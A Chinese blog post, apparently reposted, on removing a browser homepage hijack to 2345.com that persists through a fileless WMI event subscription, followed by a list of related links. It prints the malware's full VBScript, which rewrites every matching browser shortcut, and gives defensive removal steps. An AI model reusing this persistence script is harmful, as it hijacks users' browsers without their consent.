IE以及其他浏览器主页被劫持到www.2345.com/?kunown的解决办法
近日在网上相续看到有网友表示自己在下载使用了VeryCD下载链接查看器这款工具以后,再打开浏览器就被直接跳转到 www.2345.com/?kunown 这个导航页面了,而且打开多个浏览器:IE、Chrome、Firefox、Opera、Safari、Maxthon,均相同症状,检查浏览器首页设置——均正常!
最后发现,原来快速启动栏的IE浏览器快捷命令被其修改,修改后的类似如下图,于是认为就是普通的修改快捷方式,手工删除 2345 网址的部分,但半小时后再次被更改了。考虑到可能加载了启动项,在注册表、启动项、服务等中均未查找到相关信息,重启后IE快捷方式被重新篡改。尝试了事件查看器和任务计划,均未在里面查出任何信息。
之后又安装了超级兔子、360、exterminateit等工具进行检查,也未检出。
打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了……),修改Win7下opera快速启动图标路径类似如下:
C:\Users\iefans\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera12.01 1532.lnk
查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装
http://www.microsoft.com/en-us/download/details.aspx?id=24045
安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\subscription”,确定,出现下图:
点击左侧_EventFilter:Name="unown_filter",再至右侧右键点击ActiveScriptEventConsume r Name="unown",选择view instant properties,如下图:
查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中)。
受到影响的浏览器有(各色浏览器,差不多齐了):
"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"
具体代码如下:
On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:\Users\Gemini\Desktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu":UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If
最后,清除方法:在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除!
删不掉?
到WMITool安装路径(例如:C:\Program Files (x86)\WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!
还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!
暂时就这么多了,还有没有其它影响的话,用用再看吧!
解决方法来自:Gemini
文章引用地址: http://www.iefans.net/ie-zhuye-jiechi-www-2345-com-kunown/ 作者:iefans
IE以及其他浏览器主页被劫持到www.2345.com/?kunown的解决办法相关推荐
- newduba首页怎么去掉_【主页劫持】关于浏览器主页被劫持到毒霸网址大全的解决方法...
摘要 亲爱的360浏览器用户们近期我们收到不少用户反馈浏览器主页被劫持到https://www.duba.com/?f=qd_numswdh&开头的毒霸网址大全,经技术联系用户排查劫持的原因是 ...
- 修改 Chrome浏览器主页被劫持 chrome 主页被篡改成hao.qquu8.com的解决方案
修改 Chrome浏览器主页被劫持 chrome 主页被篡改成hao.qquu8.com的解决方案 参考文章: (1)修改 Chrome浏览器主页被劫持 chrome 主页被篡改成hao.qquu8. ...
- 关于浏览器主页被劫持
关于浏览器主页被劫持 等待解决中 我反正是解决了!!嘿嘿 通过我的不谢百度,没有感谢. 1.可能是52快压这款软件导致的.可我一直用这款软件,没想到他还会强制打开网址?我电脑上四个浏览器为何,其他的没 ...
- 浏览器主页被劫持 解决方法
https://www.52pojie.cn/forum.php?mod=viewthread&tid=607115&page=1&authorid=526188 看见论坛里有 ...
- 关于浏览器主页被劫持问题解决办法
关于浏览器主页被劫持问题解决办法 参考文章: (1)关于浏览器主页被劫持问题解决办法 (2)https://www.cnblogs.com/beyondyourself/p/6097345.html ...
- 解决浏览器主页被劫持问题
解决浏览器主页被劫持问题 参考文章: (1)解决浏览器主页被劫持问题 (2)https://www.cnblogs.com/canger/p/10320568.html 备忘一下.
- 手动解决浏览器主页被劫持的问题
手动解决浏览器主页被劫持的问题 问题描述 当我打开浏览器的时候,他的主页不是我之前设置的主页,而是被第三方软件劫持.出现我个人不喜欢的广告页面.而且是试过使用安全软件的方法去掉浏览器主页拦截,但是没有 ...
- 解决浏览器主页被劫持为hao123
解决浏览器主页被劫持为hao123 最近电脑浏览器主页莫名其妙被劫持了,找了好多方法都不管用,下面这个亲测有效 下载火绒安全杀毒软件 地址:https://www.huorong.cn/ 专杀工具,下 ...
- 打开一个浏览器跳转到2345浏览器主页 这里以Google为例 亲测已解决。
打开一个浏览器跳转到2345浏览器主页 这里以Google为例 亲测已解决. 1,打开浏览器,找到设置. 2,在设置里边找到 代理设置 点开. 3,点开常规,将方框内箭头位置的2345浏览器主页换成 ...
最新文章
- html图片滚动红点_HTML中更换或添加网站背景图片的代码怎么写?(示例)
- delphi ttabcontrol 顺序_健身指南健身训练,这样安排顺序更有效哦!
- java计算器监听_计算器及事件监听
- python 多继承的问题
- python回归预测例子_案例实战 | 逻辑回归实现客户流失预测(附Python代码与源数据)...
- 人群与网络:社会选择与社会影响
- 三度其一——数量场的梯度
- 对象的生命周期回顾篇
- Mac 借用工具删除顽固软件、清除它在开机启动项的内容
- MySQL的子查询(二十)
- 删除字符串中多余的空格 美团校园招聘模拟测试题
- 第2章 先从看得到的入手,探究活动
- 第二章:真分数理论(真分数模型:概念、假设、平行测验)
- HTML基础 冲冲冲
- react基于WOW.js和Animate.css实现特定位置的动画执行
- 后浪的Java追随者们是什么样的?
- microbit题目和规范文档
- 【独家】硅谷创业公司在中国常跌的五个坑|禾赛科技CEO李一帆柏林亚太周主题演讲...
- 云原生系列技术(四):DevOps技术
- 场效应管(FET)总结:
热门文章
- python逐行写入文件_Python文件逐行写入
- 快速查找论文的源代码网站资料
- JVM之JVM面试题整理(长期更新)
- Configuring the Salt Minion - Salt Minion配置参数的完全说明
- 计算机编程数学不好能学吗,高中数学学的不好,对学习计算机编程有影响吗?...
- 超详细快速入门JavaScript详解(一)
- java五星好评_亲,麻烦给个五星好评!—RatingBar
- Ubuntu下adb无法识别android设备的解决方法
- 数据结构之数据指标对比(Performance Measurement)
- 学术英语(理工)第二版unit5课文翻译